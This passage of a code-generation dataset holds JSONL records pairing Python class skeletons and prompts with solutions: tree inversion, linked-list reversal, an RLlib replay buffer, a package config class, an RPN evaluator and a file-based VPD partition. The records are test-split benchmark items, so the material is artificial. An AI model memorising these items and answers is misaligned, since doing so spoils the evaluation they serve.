solution\"\"\"\n if not root:\n return None\n left = self.invertTree(root.left)\n right = self.invertTree(root.right)\n root.left = right\n root.right = left\n return root\n\n def invertTree1(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode\"\"\"\n if not root:\n return None\n q = deque([root])\n while len(q) > 0:\n node = q.popleft()\n temp = node.left\n node.left = node.right\n node.right = temp\n if node.left != None:\n q.append(node.left)\n if node.right != None:\n q.append(node.right)\n return root\n", "source": "the_stack_v2_python_sparse", "source_path": "Leetcode/BSTQuestions/invertbinarytree.py", "source_repo": "nanaboat/data-structures", "split": "test", "star_events_count": 0} {"blob_id": "161dccc492b6da747c3a26392360b25c06096edf", "bodies": ["def new_buffer():\n return SegmentationBuffer(capacity, max_seq_len, max_ep_len)\nself.buffers = defaultdict(new_buffer)", "batch = batch.copy()\nbatch = batch.as_multi_agent()\nfor policy_id, sample_batch in batch.policy_batches.items():\n self.buffers[policy_id].add(sample_batch)", "samples = {}\nfor policy_id, buffer in self.buffers.items():\n samples[policy_id] = buffer.sample(batch_size)\nreturn MultiAgentBatch(samples, batch_size)"], "bodies_text": "<|body_start_0|>\n def new_buffer():\n return SegmentationBuffer(capacity, max_seq_len, max_ep_len)\n self.buffers = defaultdict(new_buffer)\n<|end_body_0|>\n\n<|body_start_1|>\n batch = batch.copy()\n batch = batch.as_multi_agent()\n for policy_id, sample_batch in batch.policy_batches.items():\n self.buffers[policy_id].add(sample_batch)\n<|end_body_1|>\n\n<|body_start_2|>\n samples = {}\n for policy_id, buffer in self.buffers.items():\n samples[policy_id] = buffer.sample(batch_size)\n return MultiAgentBatch(samples, batch_size)\n<|end_body_2|>\n", "class_docstring": "A minimal replay buffer used by Decision Transformer (DT) to process episodes into max_seq_len length segments and do shuffling. Stores MultiAgentSample.", "class_name": "MultiAgentSegmentationBuffer", "detected_licenses": ["MIT", "BSD-3-Clause", "Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MultiAgentSegmentationBuffer:\n \"\"\"A minimal replay buffer used by Decision Transformer (DT) to process episodes into max_seq_len length segments and do shuffling. Stores MultiAgentSample.\"\"\"\n\n def __init__(self, capacity: int=20, max_seq_len: int=20, max_ep_len: int=1000):\n \"\"\"Args: capacity: Maximum number of episodes the buffer can store. max_seq_len: Length of segments that are sampled. max_ep_len: Maximum length of episodes added.\"\"\"\n <|body_0|>\n\n def add(self, batch: SampleBatchType):\n \"\"\"Add a MultiAgentBatch of episodes. Replace if full. Args: batch: MultiAgentBatch of full episodes.\"\"\"\n <|body_1|>\n\n def sample(self, batch_size: int) -> MultiAgentBatch:\n \"\"\"Sample segments from the buffer. Args: batch_size: number of segments to sample. Returns: MultiAgentBatch of segments with keys and shape { OBS: [batch_size, max_seq_len, obs_dim], ACTIONS: [batch_size, max_seq_len, act_dim], RETURNS_TO_GO: [batch_size, max_seq_len + 1, 1], T: [batch_size, max_seq_len], ATTENTION_MASKS: [batch_size, max_seq_len], }\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def new_buffer():\n return SegmentationBuffer(capacity, max_seq_len, max_ep_len)\n self.buffers = defaultdict(new_buffer)\n<|end_body_0|>\n\n<|body_start_1|>\n batch = batch.copy()\n batch = batch.as_multi_agent()\n for policy_id, sample_batch in batch.policy_batches.items():\n self.buffers[policy_id].add(sample_batch)\n<|end_body_1|>\n\n<|body_start_2|>\n samples = {}\n for policy_id, buffer in self.buffers.items():\n samples[policy_id] = buffer.sample(batch_size)\n return MultiAgentBatch(samples, batch_size)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000241", "length_bytes": 7703, "license_type": "permissive", "methods": [{"docstring": "Args: capacity: Maximum number of episodes the buffer can store. max_seq_len: Length of segments that are sampled. max_ep_len: Maximum length of episodes added.", "name": "__init__", "signature": "def __init__(self, capacity: int=20, max_seq_len: int=20, max_ep_len: int=1000)"}, {"docstring": "Add a MultiAgentBatch of episodes. Replace if full. Args: batch: MultiAgentBatch of full episodes.", "name": "add", "signature": "def add(self, batch: SampleBatchType)"}, {"docstring": "Sample segments from the buffer. Args: batch_size: number of segments to sample. Returns: MultiAgentBatch of segments with keys and shape { OBS: [batch_size, max_seq_len, obs_dim], ACTIONS: [batch_size, max_seq_len, act_dim], RETURNS_TO_GO: [batch_size, max_seq_len + 1, 1], T: [batch_size, max_seq_len], ATTENTION_MASKS: [batch_size, max_seq_len], }", "name": "sample", "signature": "def sample(self, batch_size: int) -> MultiAgentBatch"}], "n_methods": 3, "prompt": "Implement the Python class `MultiAgentSegmentationBuffer` described below.\n\nClass description:\nA minimal replay buffer used by Decision Transformer (DT) to process episodes into max_seq_len length segments and do shuffling. Stores MultiAgentSample.\n\nMethod signatures and docstrings:\n- def __init__(self, capacity: int=20, max_seq_len: int=20, max_ep_len: int=1000): Args: capacity: Maximum number of episodes the buffer can store. max_seq_len: Length of segments that are sampled. max_ep_len: Maximum length of episodes added.\n- def add(self, batch: SampleBatchType): Add a MultiAgentBatch of episodes. Replace if full. Args: batch: MultiAgentBatch of full episodes.\n- def sample(self, batch_size: int) -> MultiAgentBatch: Sample segments from the buffer. Args: batch_size: number of segments to sample. Returns: MultiAgentBatch of segments with keys and shape { OBS: [batch_size, max_seq_len, obs_dim], ACTIONS: [batch_size, max_seq_len, act_dim], RETURNS_TO_GO: [batch_size, max_seq_len + 1, 1], T: [batch_size, max_seq_len], ATTENTION_MASKS: [batch_size, max_seq_len], }", "prompted_full_text": "Implement the Python class `MultiAgentSegmentationBuffer` described below.\n\nClass description:\nA minimal replay buffer used by Decision Transformer (DT) to process episodes into max_seq_len length segments and do shuffling. Stores MultiAgentSample.\n\nMethod signatures and docstrings:\n- def __init__(self, capacity: int=20, max_seq_len: int=20, max_ep_len: int=1000): Args: capacity: Maximum number of episodes the buffer can store. max_seq_len: Length of segments that are sampled. max_ep_len: Maximum length of episodes added.\n- def add(self, batch: SampleBatchType): Add a MultiAgentBatch of episodes. Replace if full. Args: batch: MultiAgentBatch of full episodes.\n- def sample(self, batch_size: int) -> MultiAgentBatch: Sample segments from the buffer. Args: batch_size: number of segments to sample. Returns: MultiAgentBatch of segments with keys and shape { OBS: [batch_size, max_seq_len, obs_dim], ACTIONS: [batch_size, max_seq_len, act_dim], RETURNS_TO_GO: [batch_size, max_seq_len + 1, 1], T: [batch_size, max_seq_len], ATTENTION_MASKS: [batch_size, max_seq_len], }\n\n<|skeleton|>\nclass MultiAgentSegmentationBuffer:\n \"\"\"A minimal replay buffer used by Decision Transformer (DT) to process episodes into max_seq_len length segments and do shuffling. Stores MultiAgentSample.\"\"\"\n\n def __init__(self, capacity: int=20, max_seq_len: int=20, max_ep_len: int=1000):\n \"\"\"Args: capacity: Maximum number of episodes the buffer can store. max_seq_len: Length of segments that are sampled. max_ep_len: Maximum length of episodes added.\"\"\"\n <|body_0|>\n\n def add(self, batch: SampleBatchType):\n \"\"\"Add a MultiAgentBatch of episodes. Replace if full. Args: batch: MultiAgentBatch of full episodes.\"\"\"\n <|body_1|>\n\n def sample(self, batch_size: int) -> MultiAgentBatch:\n \"\"\"Sample segments from the buffer. Args: batch_size: number of segments to sample. Returns: MultiAgentBatch of segments with keys and shape { OBS: [batch_size, max_seq_len, obs_dim], ACTIONS: [batch_size, max_seq_len, act_dim], RETURNS_TO_GO: [batch_size, max_seq_len + 1, 1], T: [batch_size, max_seq_len], ATTENTION_MASKS: [batch_size, max_seq_len], }\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def new_buffer():\n return SegmentationBuffer(capacity, max_seq_len, max_ep_len)\n self.buffers = defaultdict(new_buffer)\n<|end_body_0|>\n\n<|body_start_1|>\n batch = batch.copy()\n batch = batch.as_multi_agent()\n for policy_id, sample_batch in batch.policy_batches.items():\n self.buffers[policy_id].add(sample_batch)\n<|end_body_1|>\n\n<|body_start_2|>\n samples = {}\n for policy_id, buffer in self.buffers.items():\n samples[policy_id] = buffer.sample(batch_size)\n return MultiAgentBatch(samples, batch_size)\n<|end_body_2|>\n", "revision_id": "edba68c3e7cf255d1d6479329f305adb7fa4c3ed", "skeleton": "<|skeleton|>\nclass MultiAgentSegmentationBuffer:\n \"\"\"A minimal replay buffer used by Decision Transformer (DT) to process episodes into max_seq_len length segments and do shuffling. Stores MultiAgentSample.\"\"\"\n\n def __init__(self, capacity: int=20, max_seq_len: int=20, max_ep_len: int=1000):\n \"\"\"Args: capacity: Maximum number of episodes the buffer can store. max_seq_len: Length of segments that are sampled. max_ep_len: Maximum length of episodes added.\"\"\"\n <|body_0|>\n\n def add(self, batch: SampleBatchType):\n \"\"\"Add a MultiAgentBatch of episodes. Replace if full. Args: batch: MultiAgentBatch of full episodes.\"\"\"\n <|body_1|>\n\n def sample(self, batch_size: int) -> MultiAgentBatch:\n \"\"\"Sample segments from the buffer. Args: batch_size: number of segments to sample. Returns: MultiAgentBatch of segments with keys and shape { OBS: [batch_size, max_seq_len, obs_dim], ACTIONS: [batch_size, max_seq_len, act_dim], RETURNS_TO_GO: [batch_size, max_seq_len + 1, 1], T: [batch_size, max_seq_len], ATTENTION_MASKS: [batch_size, max_seq_len], }\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MultiAgentSegmentationBuffer:\n \"\"\"A minimal replay buffer used by Decision Transformer (DT) to process episodes into max_seq_len length segments and do shuffling. Stores MultiAgentSample.\"\"\"\n\n def __init__(self, capacity: int=20, max_seq_len: int=20, max_ep_len: int=1000):\n \"\"\"Args: capacity: Maximum number of episodes the buffer can store. max_seq_len: Length of segments that are sampled. max_ep_len: Maximum length of episodes added.\"\"\"\n def new_buffer():\n return SegmentationBuffer(capacity, max_seq_len, max_ep_len)\n self.buffers = defaultdict(new_buffer)\n\n def add(self, batch: SampleBatchType):\n \"\"\"Add a MultiAgentBatch of episodes. Replace if full. Args: batch: MultiAgentBatch of full episodes.\"\"\"\n batch = batch.copy()\n batch = batch.as_multi_agent()\n for policy_id, sample_batch in batch.policy_batches.items():\n self.buffers[policy_id].add(sample_batch)\n\n def sample(self, batch_size: int) -> MultiAgentBatch:\n \"\"\"Sample segments from the buffer. Args: batch_size: number of segments to sample. Returns: MultiAgentBatch of segments with keys and shape { OBS: [batch_size, max_seq_len, obs_dim], ACTIONS: [batch_size, max_seq_len, act_dim], RETURNS_TO_GO: [batch_size, max_seq_len + 1, 1], T: [batch_size, max_seq_len], ATTENTION_MASKS: [batch_size, max_seq_len], }\"\"\"\n samples = {}\n for policy_id, buffer in self.buffers.items():\n samples[policy_id] = buffer.sample(batch_size)\n return MultiAgentBatch(samples, batch_size)\n", "source": "the_stack_v2_python_sparse", "source_path": "rllib/algorithms/dt/segmentation_buffer.py", "source_repo": "ray-project/ray", "split": "test", "star_events_count": 29482} {"blob_id": "327da6abc07a82011d66b2f7f0e0f52448c528e0", "bodies": ["if not head:\n return head\ncur = head\npre = None\nr = cur\nwhile cur:\n t = cur.next\n cur.next = pre\n r = cur\n pre = cur\n cur = t\nreturn r", "if not head or not head.next:\n return head\nnode = self.reverseList(head.next)\nhead.next.next = head\nhead.next = None\nreturn node"], "bodies_text": "<|body_start_0|>\n if not head:\n return head\n cur = head\n pre = None\n r = cur\n while cur:\n t = cur.next\n cur.next = pre\n r = cur\n pre = cur\n cur = t\n return r\n<|end_body_0|>\n\n<|body_start_1|>\n if not head or not head.next:\n return head\n node = self.reverseList(head.next)\n head.next.next = head\n head.next = None\n return node\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def reverseList1(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_0|>\n\n def reverseList(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not head:\n return head\n cur = head\n pre = None\n r = cur\n while cur:\n t = cur.next\n cur.next = pre\n r = cur\n pre = cur\n cur = t\n return r\n<|end_body_0|>\n\n<|body_start_1|>\n if not head or not head.next:\n return head\n node = self.reverseList(head.next)\n head.next.next = head\n head.next = None\n return node\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000242", "length_bytes": 945, "license_type": "no_license", "methods": [{"docstring": ":type head: ListNode :rtype: ListNode", "name": "reverseList1", "signature": "def reverseList1(self, head)"}, {"docstring": ":type head: ListNode :rtype: ListNode", "name": "reverseList", "signature": "def reverseList(self, head)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def reverseList1(self, head): :type head: ListNode :rtype: ListNode\n- def reverseList(self, head): :type head: ListNode :rtype: ListNode", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def reverseList1(self, head): :type head: ListNode :rtype: ListNode\n- def reverseList(self, head): :type head: ListNode :rtype: ListNode\n\n<|skeleton|>\nclass Solution:\n\n def reverseList1(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_0|>\n\n def reverseList(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not head:\n return head\n cur = head\n pre = None\n r = cur\n while cur:\n t = cur.next\n cur.next = pre\n r = cur\n pre = cur\n cur = t\n return r\n<|end_body_0|>\n\n<|body_start_1|>\n if not head or not head.next:\n return head\n node = self.reverseList(head.next)\n head.next.next = head\n head.next = None\n return node\n<|end_body_1|>\n", "revision_id": "e5b018493bbd12edcdcd0434f35d9c358106d391", "skeleton": "<|skeleton|>\nclass Solution:\n\n def reverseList1(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_0|>\n\n def reverseList(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def reverseList1(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n if not head:\n return head\n cur = head\n pre = None\n r = cur\n while cur:\n t = cur.next\n cur.next = pre\n r = cur\n pre = cur\n cur = t\n return r\n\n def reverseList(self, head):\n \"\"\":type head: ListNode :rtype: ListNode\"\"\"\n if not head or not head.next:\n return head\n node = self.reverseList(head.next)\n head.next.next = head\n head.next = None\n return node\n", "source": "the_stack_v2_python_sparse", "source_path": "py/leetcode/206.py", "source_repo": "wfeng1991/learnpy", "split": "test", "star_events_count": 0} {"blob_id": "e7085d064b12f79c494c6e711c10d8c47f98ac1b", "bodies": ["self.widgetConfigs = ConvertConfigsToDictionary(widgetConfigs)\nself.modConfigs = ConvertConfigsToDictionary(modConfigs)\nself.positioningConfigs = ConvertConfigsToDictionary(positioningConfigs)\nself.sizingConfigs = ConvertConfigsToDictionary(sizingConfigs)\nself.serviceConfigs = ConvertConfigsToDictionary(serviceConfigs)", "self.filename = filename\nfor name in self.widgetConfigs:\n self.widgetConfigs[name].setPackageFilename(filename)"], "bodies_text": "<|body_start_0|>\n self.widgetConfigs = ConvertConfigsToDictionary(widgetConfigs)\n self.modConfigs = ConvertConfigsToDictionary(modConfigs)\n self.positioningConfigs = ConvertConfigsToDictionary(positioningConfigs)\n self.sizingConfigs = ConvertConfigsToDictionary(sizingConfigs)\n self.serviceConfigs = ConvertConfigsToDictionary(serviceConfigs)\n<|end_body_0|>\n\n<|body_start_1|>\n self.filename = filename\n for name in self.widgetConfigs:\n self.widgetConfigs[name].setPackageFilename(filename)\n<|end_body_1|>\n", "class_docstring": "Represents the configuration for a knot package", "class_name": "PackageConfig", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PackageConfig:\n \"\"\"Represents the configuration for a knot package\"\"\"\n\n def __init__(self, widgetConfigs, modConfigs, positioningConfigs, sizingConfigs, serviceConfigs):\n \"\"\"Initialize the widget config with its widgets, positioning policies and sizing policies\"\"\"\n <|body_0|>\n\n def setPackageFilename(self, filename):\n \"\"\"Set the package filename\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.widgetConfigs = ConvertConfigsToDictionary(widgetConfigs)\n self.modConfigs = ConvertConfigsToDictionary(modConfigs)\n self.positioningConfigs = ConvertConfigsToDictionary(positioningConfigs)\n self.sizingConfigs = ConvertConfigsToDictionary(sizingConfigs)\n self.serviceConfigs = ConvertConfigsToDictionary(serviceConfigs)\n<|end_body_0|>\n\n<|body_start_1|>\n self.filename = filename\n for name in self.widgetConfigs:\n self.widgetConfigs[name].setPackageFilename(filename)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000243", "length_bytes": 957, "license_type": "no_license", "methods": [{"docstring": "Initialize the widget config with its widgets, positioning policies and sizing policies", "name": "__init__", "signature": "def __init__(self, widgetConfigs, modConfigs, positioningConfigs, sizingConfigs, serviceConfigs)"}, {"docstring": "Set the package filename", "name": "setPackageFilename", "signature": "def setPackageFilename(self, filename)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003068", "prompt": "Implement the Python class `PackageConfig` described below.\n\nClass description:\nRepresents the configuration for a knot package\n\nMethod signatures and docstrings:\n- def __init__(self, widgetConfigs, modConfigs, positioningConfigs, sizingConfigs, serviceConfigs): Initialize the widget config with its widgets, positioning policies and sizing policies\n- def setPackageFilename(self, filename): Set the package filename", "prompted_full_text": "Implement the Python class `PackageConfig` described below.\n\nClass description:\nRepresents the configuration for a knot package\n\nMethod signatures and docstrings:\n- def __init__(self, widgetConfigs, modConfigs, positioningConfigs, sizingConfigs, serviceConfigs): Initialize the widget config with its widgets, positioning policies and sizing policies\n- def setPackageFilename(self, filename): Set the package filename\n\n<|skeleton|>\nclass PackageConfig:\n \"\"\"Represents the configuration for a knot package\"\"\"\n\n def __init__(self, widgetConfigs, modConfigs, positioningConfigs, sizingConfigs, serviceConfigs):\n \"\"\"Initialize the widget config with its widgets, positioning policies and sizing policies\"\"\"\n <|body_0|>\n\n def setPackageFilename(self, filename):\n \"\"\"Set the package filename\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.widgetConfigs = ConvertConfigsToDictionary(widgetConfigs)\n self.modConfigs = ConvertConfigsToDictionary(modConfigs)\n self.positioningConfigs = ConvertConfigsToDictionary(positioningConfigs)\n self.sizingConfigs = ConvertConfigsToDictionary(sizingConfigs)\n self.serviceConfigs = ConvertConfigsToDictionary(serviceConfigs)\n<|end_body_0|>\n\n<|body_start_1|>\n self.filename = filename\n for name in self.widgetConfigs:\n self.widgetConfigs[name].setPackageFilename(filename)\n<|end_body_1|>\n", "revision_id": "19b7bf08658ce329c7b076ce2014bae9f5f09268", "skeleton": "<|skeleton|>\nclass PackageConfig:\n \"\"\"Represents the configuration for a knot package\"\"\"\n\n def __init__(self, widgetConfigs, modConfigs, positioningConfigs, sizingConfigs, serviceConfigs):\n \"\"\"Initialize the widget config with its widgets, positioning policies and sizing policies\"\"\"\n <|body_0|>\n\n def setPackageFilename(self, filename):\n \"\"\"Set the package filename\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PackageConfig:\n \"\"\"Represents the configuration for a knot package\"\"\"\n\n def __init__(self, widgetConfigs, modConfigs, positioningConfigs, sizingConfigs, serviceConfigs):\n \"\"\"Initialize the widget config with its widgets, positioning policies and sizing policies\"\"\"\n self.widgetConfigs = ConvertConfigsToDictionary(widgetConfigs)\n self.modConfigs = ConvertConfigsToDictionary(modConfigs)\n self.positioningConfigs = ConvertConfigsToDictionary(positioningConfigs)\n self.sizingConfigs = ConvertConfigsToDictionary(sizingConfigs)\n self.serviceConfigs = ConvertConfigsToDictionary(serviceConfigs)\n\n def setPackageFilename(self, filename):\n \"\"\"Set the package filename\"\"\"\n self.filename = filename\n for name in self.widgetConfigs:\n self.widgetConfigs[name].setPackageFilename(filename)\n", "source": "the_stack_v2_python_sparse", "source_path": "src/knot/loader/config/package_config.py", "source_repo": "cloew/Knot", "split": "test", "star_events_count": 1} {"blob_id": "a155f34bbe13a1ec52071b4086b404e330d3827a", "bodies": ["stack = []\nfor token in tokens:\n if token not in ('+', '-', '*', '/'):\n stack.append(token)\n else:\n x, y = (int(stack.pop()), int(stack.pop()))\n if token == '+':\n stack.append(x + y)\n elif token == '-':\n stack.append(y - x)\n elif token == '*':\n stack.append(x * y)\n else:\n stack.append(y / x)\nreturn int(stack[0])", "op_to_binary_fn = {'+': add, '-': sub, '*': mul, '/': lambda x, y: int(x / y)}\nn = len(tokens)\nstack = [0] * ((n + 1) // 2)\nindex = -1\nfor token in tokens:\n try:\n num = int(token)\n index += 1\n stack[index] = num\n except ValueError:\n index -= 1\n stack[index] = op_to_binary_fn[token](stack[index], stack[index + 1])\nreturn stack[0]"], "bodies_text": "<|body_start_0|>\n stack = []\n for token in tokens:\n if token not in ('+', '-', '*', '/'):\n stack.append(token)\n else:\n x, y = (int(stack.pop()), int(stack.pop()))\n if token == '+':\n stack.append(x + y)\n elif token == '-':\n stack.append(y - x)\n elif token == '*':\n stack.append(x * y)\n else:\n stack.append(y / x)\n return int(stack[0])\n<|end_body_0|>\n\n<|body_start_1|>\n op_to_binary_fn = {'+': add, '-': sub, '*': mul, '/': lambda x, y: int(x / y)}\n n = len(tokens)\n stack = [0] * ((n + 1) // 2)\n index = -1\n for token in tokens:\n try:\n num = int(token)\n index += 1\n stack[index] = num\n except ValueError:\n index -= 1\n stack[index] = op_to_binary_fn[token](stack[index], stack[index + 1])\n return stack[0]\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def evalRPN(self, tokens: List[str]) -> int:\n \"\"\"栈\"\"\"\n <|body_0|>\n\n def evalRPNArray(self, tokens: List[str]) -> int:\n \"\"\"数组模拟栈\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n stack = []\n for token in tokens:\n if token not in ('+', '-', '*', '/'):\n stack.append(token)\n else:\n x, y = (int(stack.pop()), int(stack.pop()))\n if token == '+':\n stack.append(x + y)\n elif token == '-':\n stack.append(y - x)\n elif token == '*':\n stack.append(x * y)\n else:\n stack.append(y / x)\n return int(stack[0])\n<|end_body_0|>\n\n<|body_start_1|>\n op_to_binary_fn = {'+': add, '-': sub, '*': mul, '/': lambda x, y: int(x / y)}\n n = len(tokens)\n stack = [0] * ((n + 1) // 2)\n index = -1\n for token in tokens:\n try:\n num = int(token)\n index += 1\n stack[index] = num\n except ValueError:\n index -= 1\n stack[index] = op_to_binary_fn[token](stack[index], stack[index + 1])\n return stack[0]\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000244", "length_bytes": 1540, "license_type": "no_license", "methods": [{"docstring": "栈", "name": "evalRPN", "signature": "def evalRPN(self, tokens: List[str]) -> int"}, {"docstring": "数组模拟栈", "name": "evalRPNArray", "signature": "def evalRPNArray(self, tokens: List[str]) -> int"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006825", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def evalRPN(self, tokens: List[str]) -> int: 栈\n- def evalRPNArray(self, tokens: List[str]) -> int: 数组模拟栈", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def evalRPN(self, tokens: List[str]) -> int: 栈\n- def evalRPNArray(self, tokens: List[str]) -> int: 数组模拟栈\n\n<|skeleton|>\nclass Solution:\n\n def evalRPN(self, tokens: List[str]) -> int:\n \"\"\"栈\"\"\"\n <|body_0|>\n\n def evalRPNArray(self, tokens: List[str]) -> int:\n \"\"\"数组模拟栈\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n stack = []\n for token in tokens:\n if token not in ('+', '-', '*', '/'):\n stack.append(token)\n else:\n x, y = (int(stack.pop()), int(stack.pop()))\n if token == '+':\n stack.append(x + y)\n elif token == '-':\n stack.append(y - x)\n elif token == '*':\n stack.append(x * y)\n else:\n stack.append(y / x)\n return int(stack[0])\n<|end_body_0|>\n\n<|body_start_1|>\n op_to_binary_fn = {'+': add, '-': sub, '*': mul, '/': lambda x, y: int(x / y)}\n n = len(tokens)\n stack = [0] * ((n + 1) // 2)\n index = -1\n for token in tokens:\n try:\n num = int(token)\n index += 1\n stack[index] = num\n except ValueError:\n index -= 1\n stack[index] = op_to_binary_fn[token](stack[index], stack[index + 1])\n return stack[0]\n<|end_body_1|>\n", "revision_id": "52756b30e9d51794591aca030bc918e707f473f1", "skeleton": "<|skeleton|>\nclass Solution:\n\n def evalRPN(self, tokens: List[str]) -> int:\n \"\"\"栈\"\"\"\n <|body_0|>\n\n def evalRPNArray(self, tokens: List[str]) -> int:\n \"\"\"数组模拟栈\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def evalRPN(self, tokens: List[str]) -> int:\n \"\"\"栈\"\"\"\n stack = []\n for token in tokens:\n if token not in ('+', '-', '*', '/'):\n stack.append(token)\n else:\n x, y = (int(stack.pop()), int(stack.pop()))\n if token == '+':\n stack.append(x + y)\n elif token == '-':\n stack.append(y - x)\n elif token == '*':\n stack.append(x * y)\n else:\n stack.append(y / x)\n return int(stack[0])\n\n def evalRPNArray(self, tokens: List[str]) -> int:\n \"\"\"数组模拟栈\"\"\"\n op_to_binary_fn = {'+': add, '-': sub, '*': mul, '/': lambda x, y: int(x / y)}\n n = len(tokens)\n stack = [0] * ((n + 1) // 2)\n index = -1\n for token in tokens:\n try:\n num = int(token)\n index += 1\n stack[index] = num\n except ValueError:\n index -= 1\n stack[index] = op_to_binary_fn[token](stack[index], stack[index + 1])\n return stack[0]\n", "source": "the_stack_v2_python_sparse", "source_path": "150.逆波兰表达式求值/solution.py", "source_repo": "QtTao/daily_leetcode", "split": "test", "star_events_count": 0} {"blob_id": "d990f99a85837f2e7ae11b0c294f68e8fbb78c55", "bodies": ["for key in keys:\n file_path = self._device.path.join(self._path, key)\n if self._device.path.exists(file_path):\n self._device.CheckCall(['rm', '-f', file_path])\n return", "for k, v in items.items():\n file_name = self._device.path.join(self._path, k)\n if v is not None:\n dir_name = self._device.path.dirname(file_name)\n self._device.CheckCall(['mkdir', '-p', dir_name])\n self._device.WriteFile(file_name, v)\n else:\n self._device.CheckCall(['rm', '-f', file_name])\nself._device.CheckCall(['sync'])"], "bodies_text": "<|body_start_0|>\n for key in keys:\n file_path = self._device.path.join(self._path, key)\n if self._device.path.exists(file_path):\n self._device.CheckCall(['rm', '-f', file_path])\n return\n<|end_body_0|>\n\n<|body_start_1|>\n for k, v in items.items():\n file_name = self._device.path.join(self._path, k)\n if v is not None:\n dir_name = self._device.path.dirname(file_name)\n self._device.CheckCall(['mkdir', '-p', dir_name])\n self._device.WriteFile(file_name, v)\n else:\n self._device.CheckCall(['rm', '-f', file_name])\n self._device.CheckCall(['sync'])\n<|end_body_1|>\n", "class_docstring": "A file-based VPD partition.", "class_name": "MutableFileBasedPartition", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MutableFileBasedPartition:\n \"\"\"A file-based VPD partition.\"\"\"\n\n def Delete(self, *keys):\n \"\"\"See Partition.Delete.\"\"\"\n <|body_0|>\n\n def Update(self, items, log=True):\n \"\"\"See Partition.Update.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for key in keys:\n file_path = self._device.path.join(self._path, key)\n if self._device.path.exists(file_path):\n self._device.CheckCall(['rm', '-f', file_path])\n return\n<|end_body_0|>\n\n<|body_start_1|>\n for k, v in items.items():\n file_name = self._device.path.join(self._path, k)\n if v is not None:\n dir_name = self._device.path.dirname(file_name)\n self._device.CheckCall(['mkdir', '-p', dir_name])\n self._device.WriteFile(file_name, v)\n else:\n self._device.CheckCall(['rm', '-f', file_name])\n self._device.CheckCall(['sync'])\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000245", "length_bytes": 9662, "license_type": "permissive", "methods": [{"docstring": "See Partition.Delete.", "name": "Delete", "signature": "def Delete(self, *keys)"}, {"docstring": "See Partition.Update.", "name": "Update", "signature": "def Update(self, items, log=True)"}], "n_methods": 2, "prompt": "Implement the Python class `MutableFileBasedPartition` described below.\n\nClass description:\nA file-based VPD partition.\n\nMethod signatures and docstrings:\n- def Delete(self, *keys): See Partition.Delete.\n- def Update(self, items, log=True): See Partition.Update.", "prompted_full_text": "Implement the Python class `MutableFileBasedPartition` described below.\n\nClass description:\nA file-based VPD partition.\n\nMethod signatures and docstrings:\n- def Delete(self, *keys): See Partition.Delete.\n- def Update(self, items, log=True): See Partition.Update.\n\n<|skeleton|>\nclass MutableFileBasedPartition:\n \"\"\"A file-based VPD partition.\"\"\"\n\n def Delete(self, *keys):\n \"\"\"See Partition.Delete.\"\"\"\n <|body_0|>\n\n def Update(self, items, log=True):\n \"\"\"See Partition.Update.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for key in keys:\n file_path = 